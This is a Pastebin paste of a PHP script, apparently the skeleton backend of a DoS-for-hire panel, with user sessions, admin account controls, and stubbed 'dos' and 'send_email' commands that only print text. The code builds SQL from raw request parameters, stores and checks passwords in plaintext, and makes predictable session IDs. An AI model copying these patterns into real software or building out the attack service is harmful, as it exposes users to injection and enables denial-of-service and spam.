API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Jun 4th, 2017
87
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 9.67 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2.  
  3. //configuration
  4. class Config {
  5.     public static $mysql_user = "ilia";
  6.     public static $mysql_pass = "pass";
  7.     public static $mysql_server = "localhost";
  8.     public static $mysql_database = "ilia";
  9.     public static $mysql_table_prefix = "";
  10. }
  11.  
  12. //error response codes
  13. class ErrorCode {
  14.  
  15.     /*
  16.     public static $MISSING_PARAMETERS = 1;
  17.     public static $AUTHENTICATION_FAILED = 2;
  18.     public static $USER_NOT_FOUND = 3;
  19.     public static $LOGIN_FAILED = 4;
  20.     public static $ACCESS_DENIED = 5;
  21.     public static $INVALID_COMMAND = 6;
  22.      */
  23.  
  24.     public static $MISSING_PARAMETERS = "missing params";
  25.     public static $AUTHENTICATION_FAILED = "authentication failed";
  26.     public static $USER_NOT_FOUND = "user not found";
  27.     public static $LOGIN_FAILED = "login failed";
  28.     public static $ACCESS_DENIED = "access denied";
  29.     public static $INVALID_COMMAND = "invalid command";
  30.    
  31. }
  32.  
  33. class ServletInterface {
  34.     public static function dos($host, $port, $shells, $time){
  35.         echo "dossing now!";
  36.     }
  37.  
  38.     public static function email($to, $from, $email, $subject, $message){
  39.         echo "sending email!";
  40.     }
  41. }
  42.  
  43. class Session {
  44.  
  45.     //stores all the user info
  46.     private $user = array();
  47.  
  48.     //user info is loaded in the constructor
  49.     public function __construct() {
  50.         //make sure the user parameter is set
  51.         Util::isset_m('user');
  52.  
  53.         $this->user = Mysql::getUserRow($_GET['user']);
  54.         //make sure user exists
  55.         if($this->user == null) {
  56.             Util::error(ErrorCode::$USER_NOT_FOUND);
  57.         }
  58.     }
  59.  
  60.     //login function
  61.     public function login() {
  62.        
  63.         //make sure the pass is set
  64.         Util::isset_m('pass');
  65.  
  66.         if($this->user['pass'] == $_GET['pass']) {
  67.             //update the database
  68.             $this->user['id'] = Util::random_str(20);
  69.             $this->user['ip'] = $_SERVER['REMOTE_ADDR'];
  70.             $this->user['time'] = time();
  71.             Mysql::setSession($this->user['name'], $this->user['id'], $this->user['time'], $this->user['ip']);
  72.             //echo out all the info
  73.             Util::report_info($this->user);
  74.         }else {
  75.             Util::error(ErrorCode::$LOGIN_FAILED);
  76.         }
  77.     }
  78.  
  79.     //clear the session id
  80.     public function logout() {
  81.         Mysql::clearSession($this->user['name']);
  82.     }
  83.  
  84.     //output account info
  85.     public function getAccountInfo() {
  86.         Util::report_info($this->user);
  87.     }
  88.  
  89.     //check if the session id is correct
  90.     public function checkId() {
  91.         Util::isset_m('session_id');
  92.         if($this->user['id'] != $_GET['session_id']) {
  93.             Util::error(ErrorCode::$AUTHENTICATION_FAILED);
  94.         }
  95.     }
  96.  
  97.     //make sure the user is admin
  98.     public function checkAdmin() {
  99.         if($this->user['type'] != "admin") {
  100.             Util::error(ErrorCode::$ACCESS_DENIED);
  101.         }
  102.     }
  103.  
  104.     //lock the account
  105.     public function lockAccount() {
  106.         Mysql::setStatus($this->user['name'], "locked");
  107.     }
  108.  
  109.     //unlock the account
  110.     public function unlockAccount() {
  111.         Mysql::setStatus($this->user['name'], "active");
  112.     }
  113. }
  114.  
  115. class Mysql {
  116.     private static $con = null;
  117.     // Connect to the mysql database.
  118.     public static function connect() {
  119.         self::$con = @mysql_connect(Config::$mysql_server, Config::$mysql_user, Config::$mysql_pass);
  120.         if(!self::$con){
  121.             echo "SERVER MYSQL CONNECTION ERROR";
  122.             exit(0);
  123.         }
  124.         mysql_select_db(Config::$mysql_database, self::$con);
  125.     }
  126.  
  127.     // Disconnect from the mysql database.
  128.     public static function disconnect() {
  129.         if(self::$con) {
  130.             mysql_close(self::$con);
  131.         }
  132.     }
  133.  
  134.     // Create a user into the mysql user table.
  135.     public static function createUser($user, $pass, $account_type, $extra_info) {
  136.         $time = time();
  137.         $query = "INSERT INTO " . Config::$mysql_table_prefix . "clients (user, pass, session_id, session_timeout, session_ip, account_status, active_shells, account_type, extra_info) VALUES ('$user', '$pass', '0', '$time' , '0', 'active', '0', '$account_type', '$extra_info');";
  138.         mysql_query($query);
  139.     }
  140.  
  141.     //set the session information
  142.     public static function setSession($user, $session_id, $session_time, $session_ip) {
  143.         $query = "UPDATE " . Config::$mysql_table_prefix . "clients SET session_id = '$session_id',  session_ip = '$session_ip', session_timeout = '$session_time' WHERE user = '$user'";
  144.         mysql_query($query);
  145.     }
  146.  
  147.     //clear the session information
  148.     public static function clearSession($user) {
  149.         $query = "UPDATE " . Config::$mysql_table_prefix . "clients SET session_id = '0', session_timeout = '0' WHERE user = '$user'";
  150.         mysql_query($query);
  151.     }
  152.  
  153.  
  154.     //get the user's info and return it as an array
  155.     public static function getUserRow($user) {
  156.         $query = "SELECT * FROM " . Config::$mysql_table_prefix . "clients WHERE user = '$user' LIMIT 1;";
  157.         $result = mysql_query($query);
  158.         $user = array();
  159.         if(mysql_num_rows($result) == 1) {
  160.             $resultArray = mysql_fetch_array($result);
  161.             $user['name'] = $resultArray['user'];
  162.             $user['ip'] = $resultArray['session_ip'];
  163.             $user['id'] = $resultArray['session_id'];
  164.             $user['time'] = $resultArray['session_timeout'];
  165.             $user['status'] = $resultArray['account_status'];
  166.             $user['shells'] = $resultArray['active_shells'];
  167.             $user['type'] = $resultArray['account_type'];
  168.             $user['pass'] = $resultArray['pass'];
  169.             $user['info'] = $resultArray['extra_info'];
  170.         }else {
  171.             $user = null;
  172.         }
  173.         return $user;
  174.     }
  175.  
  176.     //return the number of shells
  177.     public static function getShellCount() {
  178.         $query = "SELECT COUNT(*) FROM " . Config::$mysql_table_prefix . "shells";
  179.         return mysql_query($query);
  180.     }
  181.  
  182.     //set the user account status
  183.     public static function setStatus($u, $status) {
  184.         $query = "UPDATE " . Config::$mysql_table_prefix . "clients SET account_status = '$status' WHERE user = '$u' LIMIT 1;";
  185.         mysql_query($query);
  186.     }
  187. }
  188.  
  189. class Util {
  190.     //make sure parameters are set
  191.     public static function isset_m(/*...*/) {
  192.         $params = func_get_args();
  193.         foreach($params as $param) {
  194.             if(!isset($_GET[$param])) {
  195.                 self::error(ErrorCode::$MISSING_PARAMETERS);
  196.             }
  197.         }
  198.     }
  199.  
  200.     //create a random string
  201.     public static function random_str($length) {
  202.         $characters = "0123456789abcdefghijklmnopqrstuvwxyz";
  203.         $len = strlen($characters);
  204.         $rand = "";
  205.         for ($i = 0; $i < $length; $i++) {
  206.             $rand .= $characters[mt_rand(0, $len - 1)];
  207.         }
  208.         return $rand;
  209.     }
  210.  
  211.     //report error
  212.     public static function error($msg) {
  213.         echo "<error> $msg </error>";
  214.         Mysql::disconnect();
  215.         exit(0);
  216.     }
  217.  
  218.     //report success
  219.     public static function success($msg) {
  220.         echo "<success> $msg </success>";
  221.         Mysql::disconnect();
  222.         exit(0);
  223.     }
  224.  
  225.     //display account info as xml
  226.     public static function report_info($user) {
  227.         $total_shells = Mysql::getShellCount();
  228.         $info = "<account>\n";
  229.         $info .= "  <session_id>" . $user['id'] . "</session_id>\n";
  230.         $info .= "  <total_shells>" . $total_shells . "</total_shells>\n";
  231.         $info .= "  <active_shells>" . $user['shells'] . "</active_shells>\n";
  232.         $info .= "  <account_status>" .$user['status'] . "</account_status>\n";
  233.         $info .= "  <account_type>" . $user['type'] . "</account_type>\n";
  234.         $info .= "</account>";
  235.         echo $info;
  236.  
  237.         Mysql::disconnect();
  238.         exit(0);
  239.     }
  240.  
  241.     //display errors
  242.     public static function show_errors() {
  243.         error_reporting(E_ALL);
  244.         ini_set('display_errors', '1');
  245.     }
  246.  
  247.     //hide errors
  248.     public static function hide_errors() {
  249.         error_reporting(E_COMPILE_ERROR);
  250.         ini_set('display_errors', '0');
  251.     }
  252. }
  253.  
  254. //display all php errors
  255. Util::show_errors();
  256.  
  257. //connect to mysql
  258. Mysql::connect();
  259.  
  260. //create the user session
  261. $session = new Session();
  262.  
  263. //make sure there is a command
  264. Util::isset_m('cmd');
  265.  
  266. //authenticate
  267. if($_GET['cmd'] == "login") {
  268.     $session->login();
  269. }else{
  270.     $session->checkId();
  271. }
  272.  
  273. //parse the commands
  274. switch ($_GET['cmd']) {
  275.     case "logout":
  276.         $session->logout();
  277.         Util::success("Logout Successful");
  278.         break;
  279.     case "dos":
  280.         Util::isset_m('host','port','time','shells');
  281.         ServletInterface::dos($_GET['hot'], $_GET['port'], $_GET['shells'], $_GET['time']);
  282.         break;
  283.     case "unlock_account":
  284.         $session->checkAdmin();
  285.         $session->unlockAccount();
  286.         Util::success("Account Unlocked");
  287.         break;
  288.     case "lock_account":
  289.         $session->checkAdmin();
  290.         $session->lockAccount();
  291.         Util::success("Account Locked");
  292.         break;
  293.     case "create_user":
  294.         $session->checkAdmin();
  295.         Util::isset_m('n_user','n_pass','n_type','n_info');
  296.         Mysql::createUser($_GET['n_user'], $_GET['n_pass'], $_GET['n_type'], $_GET['n_info']);
  297.         Util::success("User Created");
  298.         break;
  299.     case "send_email":
  300.         Util::isset_m('to','from','email','subject','message');
  301.         ServletInterface::email($_GET['to'], $_GET['from'], $_GET['email'], $_GET['subject'], $_GET['message']);
  302.     case "account_info":
  303.         $session->getAccountInfo();
  304.     default:
  305.         Util::error(ErrorCode::$INVALID_COMMAND);
  306.         break;
  307. }
  308.  
  309. Mysql::disconnect();
  310.  
  311. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!